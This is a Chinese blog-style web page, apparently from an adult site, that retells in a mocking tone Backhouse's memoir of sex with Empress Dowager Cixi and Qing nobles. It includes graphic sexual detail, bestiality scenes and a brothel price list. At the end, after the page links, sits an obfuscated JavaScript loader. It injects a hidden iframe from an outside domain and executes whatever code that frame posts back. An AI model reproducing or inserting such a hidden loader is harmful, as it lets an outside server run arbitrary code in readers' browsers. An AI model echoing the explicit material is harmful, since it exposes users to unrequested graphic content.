字幕網- 每日更新 永久免費

這篇文主要素材都出自港版《太後與我》,繁體豎排版,平常一本書最多看4小時,這豎排害得我活活看了十幾小時。最近內地也出了簡體版,我也買了,專為驗證何處刪減,可惜書還沒送到——港版實在是重口味,簡直像慈禧主演的索多瑪120天。我挑選出來敘述的,跟港版比,簡直是小清新了~~

  關於這本書的真偽,主流意見是全屬偽造。我的意見是,主流意見算個屁。二十四史相對權威吧,所記錄的宮廷淫亂,尤其是南北朝,很多段落完全是A片情節。宮廷本就是人性之惡博覽會,當你有權亂搞所能想到的任何人類時,你會乖乖停留在意淫階段?放縱比克製,更符合人性。

  我傾向於認為巴克斯是將自己的經曆、聽來的宮廷秘聞加上藝術想象,當成寫實小說寫出來了。恐怕哪些是真、哪些是假,他自己也無法辨認。人類總是善於自欺。可惜學術界對這本書基本上全盤否認,沒人以紮實的考據去證實,或者證偽。

  建議將《太後與我》跟《步步驚心》等清穿題材搭配著看。老實說,我之所以不太喜歡穿越戲和穿越文,就是看了些亂七八糟的正史野史,對皇帝這個物種,以及皇室這個生物群,無好感。

  巴克斯,英國富二代、美男子,舊愛是英國文豪王爾德、法國詩人魏爾倫。

  他32歲,慈禧69歲,一見傾心,萬千女人中唯有慈禧能激發他的獸性。

  他與清朝親王、名士、男妓、名伶、太監玩遍情欲遊戲。

  他臨死前寫出回憶錄《太後與我》,約等於以慈禧為女主角的《金瓶梅》。

  他塑造了一個高貴又淫亂、性感又粗鄙、凶殘又賣萌的立體的慈禧。

  1

  “宜人性欲和純真魅力令我高興”

  第一次以性奴(巴克斯本人比較喜歡“臨時愛人”這個更為雅致的標簽)身份進宮,巴克斯聽李蓮英發表了一番《與老佛爺亂搞須知》後,曆經複雜工序,沐浴,熏香,服了媚藥,對於自己接下來能否不辱使命,獲得慈禧的讚許,頗有些擔憂。

  至少不能讓自己國家的陽剛之譽受到損害吧。去太後寢宮,大殿排著兩列鏡子,映射出躍躍欲試的自己,他簡直帶著點為國爭光的心情了。

  站在太後的風椅前,慈禧喚道,“霜重衾冷,盼一解寂寞”。

  從27歲開始就站到龐大帝國權利巔峰的女人,她明白,何時需要示弱。一句楚楚可憐的表達,輕巧地將生冷的性交易提升為愛與慈悲。

  巴克斯當然不是慈禧的第一個情人。大臣榮祿、恭親王奕、古董商白爺、飯店服務員史某……被八卦小報挖出來的慈禧之緋聞男友,跨越年齡、階層和種族,大概各種款式的男人,老佛爺都有心體驗之使用之。按李蓮英的說法,老佛爺從沒見過出身高貴的歐洲人一絲不掛,頗有些好奇。

  父親是銀行家,念過牛津大學,語言天賦驚人,精通英語、法語、俄語、漢語、日語、德語等12種語言,宛如活體翻譯器——重點是擁有溫文爾雅的美貌,憂鬱又無辜的氣質,這樣的巴克斯,顯然有一定資格現身說法,配合慈禧上一堂洋人生理探索體驗課。

  那是1902年,八國聯軍在北京燒殺搶掠之後,慈禧死裏逃生,回朝即改變策略,修複與外國人的關係。她不時辦些社交派對,邀請各國外交官、學者、醫生、藝術家等各路洋人進入紫禁城。而巴克斯,之前因在英國肆意揮霍導致破產,被父親發配到中國,在英國大使館擔任翻譯,也為《泰晤士報》做些翻譯工作。至於巴克斯是否如他在回憶錄中所說,是因協助返還部分八國聯軍搶奪的珍寶進宮,很難確認。他聲稱,跟慈禧第一次見麵,聊過幾句之後,慈禧便送給他一張宮內的通行證,讓他自由出入,便於隨時獻身;賜他世襲二等爵——對於慈禧來說,這是再隨性不過的性愛投資,大概等同於花心大叔為新看中的小蘿莉送張電話卡,再去QQ上為她買幾套衣服吧。

  69歲的慈禧誠懇地袒露自己對32歲的巴克斯的欲望。“脫幹淨了,我願飽眼福。”她自己則披著一件輕袍,如情趣內衣般,前身在最曖昧的地方開了洞,並邀請巴克斯玩角色扮演,“不要想著我是太後,把我當成楊貴妃,你就是那多情天子唐明皇”。

  想必慈禧是認真研究過蒼老師的片子的吧。

  這場中西文化交流,慈禧驚訝於巴克斯不像西洋油畫裏的裸體男女那樣剃毛,巴克斯則驚歎於慈禧的胸部如新娘般充滿生氣,皮膚散發香味,臀部大而渾圓,宛如珍珠,令人心儀——超越人體工學了吧?到底是近70歲的老婦還是妖怪啊?

  跟王爾德一樣,慈禧有種重口味迷信——堅信吞食男人的精液有養生之功效,末了,她傳李蓮英進來,發表感言:“好痛快!我要給他官升一級,賜三眼花翎,以紀念我們的相會。”這高齡禦姐,真是……太浪漫了。

  不愧是慈禧的首席解語花,李蓮英激動萬分,對巴克斯大加讚賞:“做臉,爭氣,我從未見過老佛爺如此滿意。你去躺幾個時辰——”

  這下,總可以好好休息了吧。

  “等下一場。”

  之後巴克斯再服媚藥,與慈禧深情互動,事後慈禧誇他,“宜人性欲和純真魅力令我高興”,還讓李蓮英送他巴黎新款保險套、四條宮中責罰太監的鞭子,鼓勵他的SM傾向。這體貼、這縱容、這寵溺,幾乎都有點感人了。

  盡管慈禧叮囑巴克斯要低調,但這類老百姓喜聞樂見的頂級猛料,怎可能封鎖得了,你當微博啊、人人網啊、face book啊是死的?第二天,巴克斯就聽見路人誇他,“這人操過老佛爺……多大的榮耀!賞多大臉!”

  清朝人的價值觀,就藏在這十幾個字之內。

  在巴克斯看來,這確實是他一生中最輝煌的業績。有人說,巴克斯探入慈禧的身體,與西方列強侵入大清王朝,構成了微妙的隱喻——很明顯的語法盲,知道什幺叫主動語態,什幺叫被動語態幺?他和慈禧,明明是女攻男受嘛。不服的同學自己去細讀港台版《太後與我》,重口味描述大麵積分布,簡直就是索多瑪120天啊。

  四十多年後回憶起這段牛逼經曆,巴克斯裝逼欲發作,來了段《金瓶梅》甚至是《海上花》、《紅樓夢》中那種繁華盡逝之感慨,“在我生命之盡頭,念及浮華歲月,虛幻權勢、墮落帝王、過往王國,佛祖之說令人心折:無欲無求,方得至樂。”

  2

  “她首先是女人,其次才是女王”

  對於第一牛郎這個身份,巴克斯演繹得格外投入。慈禧一次次傳喚他,他一次次拿出足夠的誠意,在床上嘔心瀝血,做各種彙報表演。盡管他也會自我質疑,在一個女人——尤其是大自己30多歲的老婦麵前,為何絲毫不尷尬,卻欲火焚身?人家《失戀33天》裏泡女人的娘炮,也沒這幺饑渴啊。

  “她風華無限,不隨年齡枯萎,不隨歲月凋謝。”形容慈禧的美貌和魅惑,巴克斯倒是舍得大把大把地揮霍褒義句式。

  事實上,正史中少於謳歌慈禧的容貌,但慈禧確實在後宮選秀中出類拔萃,據她的女侍官德齡記錄,“太後在妙齡時,真是一位豐姿綽約、明媚鮮麗的少女,這是宮人中所時常稱道的”。而慈禧60多歲時,美國女畫家卡爾進宮,為慈禧畫像,說她“身體各部分極為相稱,美麗的麵容與其柔嫩修美的手、苗條的身材和烏黑發亮的頭發,和諧地組合在一起”、“嫣然一笑,姿態橫生,令人自然欣悅”,這位女畫家還以美國式的浮誇,大肆感慨,“真是太美了。我不打折扣地愛上她了”,直接變蕾絲吧,同學。

  或許美貌隻是基數,權勢才是最頂級的美容。在那樣的位置,總是能修煉出一種高高在上的氣場,生長出讓人不得不服的強勢之美。

  慈禧又何嚐不是語言高手,尤其是在床上的行話方麵。巴克斯說,他發現太後詞彙量龐大,“關於男女私處、有關器物,種種形容,令人驚歎”。一切調情聖手,首先是情話發明家和濫用家。二人親熱,慈禧無數次吻他,像所有情人一樣,溫存地說些無意義的空話和騙人的鬼話。

  慈禧說,“你是我永遠的唯一。”巴克斯內心獨白卻是,騙鬼呢,知道你白日裏已經和別人做過幾次了,選擇性健忘症啊。

  作為攻,慈禧還是非常願意體諒小受的情緒,玩了一整夜,心滿意足,會假裝很民主地問:我覺得很銷魂,你怎幺樣?

  “回太後,我簡直是在人間天堂,從未有過的至樂。”廢話,能說老子煩死逑了你這老淫棍5個人也玩不過你幺。

  慈禧也會如所有女人,時不時搞搞“確認愛情你還活著嗎”的無聊遊戲,“你會似野獸一般徘徊情海,性愛無數,但我是獨一無二的,是不是?”

  巴克斯犯了錯,慈禧怒了,說,你向來巧辯,現在理屈詞窮了吧?巴克斯說:“我如此愛您。我的太後和女神。我的守護星。我日出的黎明。我寧靜夜晚的光芒……我不配獲得原諒,就讓我永遠被關在天堂之外……”李碧華說,情書越是言過其實和肉麻,越有力量。巴克斯喜歡具體而微地誇慈禧有多美,以及她的慈悲——越是凶殘的人,越愛被誇仁慈。

  巴克斯有同性戀者天然的敏感,懂得體察女人的心意,他說就如同有人形容維多利亞女王,她首先是女人,其次是女王,所以,總要讚美逢迎。巴克斯是天然的肉麻高手、裝逼達人,在他的回憶錄裏,哪怕是形容最淫亂的性愛,他也動不動引用歌德、莎士比亞、王維、孟子、《詩經》……反正,他的多語種天賦閑著也是閑著,夾雜幾國語言,亂用各國典故,顯得自己的亂搞特別具有學術高度。同理,誇讚慈禧,他有超越常人的智商和豐厚的文學知識打底,隨意調遣各國修辭,再添加些真情實感進去,慈禧便頗為受用——是人類都會受用。沒人能抵抗讚美,尤其是富有新意的、切中要害的讚美。

  慈禧帶巴克斯去遊湖,耍點讓我們蕩起雙槳的把戲,好奇寶寶附體,當巴克斯是百科全書,扔給他“十萬個為什幺”。對於未知的世界,慈禧充滿童稚的好奇,她認真問巴克斯:請告訴我,如果火星人的飛船進攻中國,國際公法將如何應對?

  她又問,將來人們能否飛翔?

  老佛爺啊,需要給你科學鬆鼠會的電話嗎。

  她最愛問的,是維多利亞女王的花邊新聞,比如她的侍衛們是否和清朝一樣淨身入宮?她的侍衛布朗相戀,為何放任路人偷拍到親熱照?有人嘲笑女王,她為何不能懲罰這些暴徒、叛國罪?女王是否好色?

  英國女王是慈禧的參照係,也是假想敵——對於敵人,我們總是假裝不在乎,又更想時時偷窺,知道點對方的壞消息。慈禧喜歡拿英女王做對象,設計各種假設題,她問巴克斯:“你實話告訴我,你的女王據說很貌美,或曾經很貌美(冒昧地問一下,是魔鏡告訴你的幺?),假如她像我這樣常常召喚你前來,你會聽從,還是會因鍾情於我而避之不見?”

  普通女人問出這樣的問題,你答不好,她最多也就是玩玩一哭二鬧三上吊;換了慈禧呢,答不好,會讓你一哭二鬧三上吊。處於王朝至高無上位置的女人,喜怒無常就是一種特權,人家隨時要你玩真心話大冒險,大冒險的內容就是,決定你下一秒是活人還是屍體。

  這樣一個機智、靈活、又不乏誠懇的外國年輕帥哥,對她懷著幾分真實的情欲,上床解悶之餘,還能回答她的各種古怪問題,性價比確實不錯。重點是,他的外國身份讓她放鬆,以至於她完全釋放出真性情:“今夜我要你比昨晚和今晨更活躍。”

  “哦。太後陛下,四次啦,對不對?我已經筋疲力盡了。”

  “哦”,太後很體貼地說,那你再喝兩杯香檳,服兩劑媚藥吧。

  她會當著皇後(據說皇後是兔唇)的麵,調侃,你嫉妒我嗎?他暫時是我的私人財產!

  蘿莉附體啊,慈禧大人!

  慈禧喜歡的一個宮女,媛婉,養了寵物狐,太後帶巴克斯去看媛婉與狐狸的真人版人獸大戰秀。她邀請巴克斯和美豔的男戲子一起3P,還給大家來點心理輔導,無需拘泥。她當著宮女的麵,說“我和巴侯爺要辦一點兒私事”,讓她和男戲子去旁邊房間隨意玩。

  有一次,慈禧和巴克斯正在狂亂中,進來一俊美太監,他一眼就看到二人是赤條條的,老佛爺無比自然:我跟侯爺正玩兒。這貼身奴才答:請老祖宗消遣。君主與太監互相調侃,毫無拘泥。

  3

  與普通腐女的差異是,她看真人版GV

  在巴克斯的回憶錄中,晚清宮廷,從慈禧太後、王公貝勒、達官貴人到太監、宮女、伶人,全是性愛界的豪放派。男與女、男與男、女與女、人與獸,隨意排列組合……許多王公、貝勒、大臣、將軍都被點名,恭親王溥偉,慶親王及他的兒子載倫、載振,差一點取代了光緒帝的“大阿哥”溥儁,貝子溥倫,肅親王的次子,大學士榮慶,將軍張勳、薑桂題……在巴克斯筆下都是同性戀,準備清穿的同學們,是不是要先帶上這個名冊,因地製宜?

  有一回,巴恪思與恭親王及其侍寵在浴室,裸著身體,促膝談心時,突然傳來一聲喝令:“跪下!”

  聲音威嚴,令人不敢不從,大家都依言跪了,唯有慶親王之子載扶任性慣了,回道:放你的屁!

  進來的正是慈禧太後,以風領遮頭,穿著黃色騎服、男式長褲和高底鞋,李蓮英和崔德隆攙扶著她,她步履穩健,惱怒地說:“誰敢出言不遜?”

  載扶嚇得魂不附體,不停地磕頭,其餘幾人代他求情,老佛爺斥罵他自負妄為:“你驕縱無禮,跟你兄長離開這裏……下流東西,太不成事體!”

  在眾人麵前,慈禧絲毫不掩飾與巴克斯的親昵,對他說,“今晚我禁止你與任何人行樂,也不許任何人和你行樂。你若不從,我就要李蓮英當我和其餘人的麵揍你,從後麵。”再轉向恭親王說:“你和你這可人兒又摟在一起啦?”親王道:“回老佛爺,他不過是洗浴之時在旁伺候。”太後說:“我自然知道他正合你的特殊口味,不過別過度,你妻子會如何講?”

  有人為老佛爺奉上茶,她賞大家坐下,又道:“我到這兒可不是執行禮法來啦,我想開開眼。你們這同性調情是如何做法?你們都該當去閹了,或者將屁股眼兒堵了,斷其迎送之路;不過這既無可能,你們、至少是你們其中幾人,須得給我好好演示一番。”

  一般的微服私訪弱爆了,電視裏那點乾隆下江南算個屁。

  人家貴為太後,就算當腐女,也是看真人版GV的高級腐女。

  慈禧本著科研精神,請人講解各種行話。男男在上的人叫“擢進”,被動的一方是“破承”;受若撅著屁股,叫“騎小驢兒”,若仰躺,稱為“掏窟窿”。三P叫“團蜜餞果”或“串糖葫蘆”,中間那人承上啟下,叫“未央”。肛交叫“桂葉”或“桃汁兒”——令人不得不感歎,漢語含蓄優雅之美。應老佛爺要求,大家賣力地一一表演一番。男妓、名伶與王宮貴族之間,兩兩組合,各種姿勢交換……老佛爺看high了,也加入,慈愛地近距離觀摩、把玩個別器官片刻。還會配上評論音軌,說誰有勞無功,誰又感情不足……巴克斯說,即使此刻,慈禧的高貴也絲毫不減。

  也許巴克斯最感慨的,便是慈禧對同性戀的寬容。在英國當王爾德因同性戀被判刑,巴克斯曾為他奔走呼號,傷心之餘到了大清國,沒想到找到一片自由樂土。

  聽說英國對同性戀要法律嚴懲,老佛爺說,那可奇了,人家喜歡操屁股,就讓他們去好了。她唯一不解的是,在性愛中,她能理解攻這一方,會感到滿意,但受又為何會覺得滿意?她動用佛學來闡釋,人各有品性,皆造物所賜,我們不過是傀儡而已,所好不同!

  對於巴克斯的種種嗜好,她給予最大的寬容。慈禧聽說,同行戀雖不是變態,但可能會折壽,還可能導致失明,所以,讓巴克斯欲過度,傷了身體,

  慈禧的底線便是,不許巴克斯跟其他女性廝混。“你身邊有無數親王、戲子。太監、男妓,我不反對,也好不妒忌。但若你與女子結婚,更不消說性交,我將永不寬恕你。”

  對情人采取有限的身體霸占,這老佛爺,實在算是虛懷若穀啊。

  看到這裏,一定有同學說,這些都是真的嗎?巴克斯的《太後與我》,不少漢學家和曆史學家認為是偽作,最有名的反對者,英國曆史學家休?特雷弗?羅珀出版了《北京隱士:巴克斯爵士的隱秘生活》,書中描述了一個完全不同而相當陰暗的巴克斯形象,指責他“有計劃、有步驟地偽造證據,欺世盜名”,犯下“一係列欺騙行為”,但事實上,這位曆史學家的論證也相當隨意,未經過切實調查,也沒拿出多少充分的證據,用《太後與我》一書譯者的話來說,結論片麵,態度馬虎,作為史學家,他自己的聲譽也因為希特勒日記的醜聞而深受影響。

  更重要的是,巴克斯回憶錄中的種種記載,描述之細微、現場感之強烈,不少王室機密、深度八卦,若非在場,很難捏造,這一點,所有史學家也難以否認。更何況,巴克斯寫這本書,是在他臨時前,若說為了利益,那倒未必——他一生宏願便是被追認為哈佛的教授,純粹的胡說八道對這事應該沒多大好處。或許我們隻是傾向於把自己不願意相信的事,指認為從未發生的事。

  如果稍稍了解曆代宮廷秘史,便會知道,《太後與我》中的重口味,也算不得多幺離奇。巴克斯的寫作態度,雖然有些裝逼,但整體上可稱為誠懇。對於太後,他投入了真情,否則也很難解釋,他這樣萬人迷般的資質,為何會在太後死後,甘於隱居北京幾十年,徹底歸於沉寂。

  如同作家駱以軍在《太後與我》的序中所說,“年輕的洋人同性戀與老佛爺”,這原該是最變態三級片的梗,但在巴克斯的描述中,卻是一幅絕美、感官爆炸、所有對象皆漂浮鬆脫的詩意盎然的愛之太虛幻境。

  巴克斯陪伴老佛爺6年,直至她被袁世凱刺殺(這也是一個顛覆常識的死因),憶起見到老佛爺的屍體,他的沉痛和不忍未曾消退:她那安放在靈柩之中的聖體,被剝掉壽衣,完全赤裸,黑斑雜陳,頭發蓬亂,私處亦清晰可辨,暴露於陵前,任由庸眾圍觀。

  PS1,《太後與我》中猛料太多,很多我都不好意思摘錄(簡直懷疑自己裝純),再挑點優雅的劇透下吧:

  比如,嘉慶皇帝可能是與孌童野合而死

  李蓮英和狗亂來,爵爺、妃子、太監們都喜歡養寵物猴以隨時人獸大戰。

  溥倫親王展示他收藏的陰毛們,全是性愛紀念,標注出處和行事日期。他的一大樂事就是舔這愛情戰利品。如退役的將軍拿出當年的大刀摩挲般。

  有些老淫棍將李子或棗子放入女子陰道內。隔夜取出吃掉。

  聽說達賴喇嘛的糞便被忠誠的信徒製成粉末,保存在小金盒中。

  蘇格拉底有一次無意窺見查米德斯的私處,那雅典青年所著長袍不慎鬆開,露出內力乾坤,差點暈厥。

  PS2,其實《太後與我》更是同人文,相比慈禧,更多篇幅寫的是巴克斯和皇室男性、太監和男妓亂搞。

  京城高級男妓館價目一覽:單次性交30兩銀;二人各行事一次45兩;品簫加10兩;被口交15兩;舔男妓肛門、陰部及會陰,叫玫瑰葉,30兩;鞭打,視輕重而定。男妓私密處仔細清潔過、塗了香料、剃了毛,光潔如麵,賞心悅目。

  男妓每月或每兩月肛門會拍出粘液,那是他們的月經。經期不接客。

  在京城高檔男妓館,巴克斯麵對著賞心悅目的男性生殖器們,如同觀賞藝術品一般,想念起昔日在英國的男友,奧斯卡王爾德,如果他在場,一定會念,英俊的男子,我們天生一對,你是我的瓊脂佳釀。魏爾倫念著他的台詞:迷戀你被我吻慰的下體。

  【14867字節】

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:【神雕虛幻篇之郭楊聯姻】【完】
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};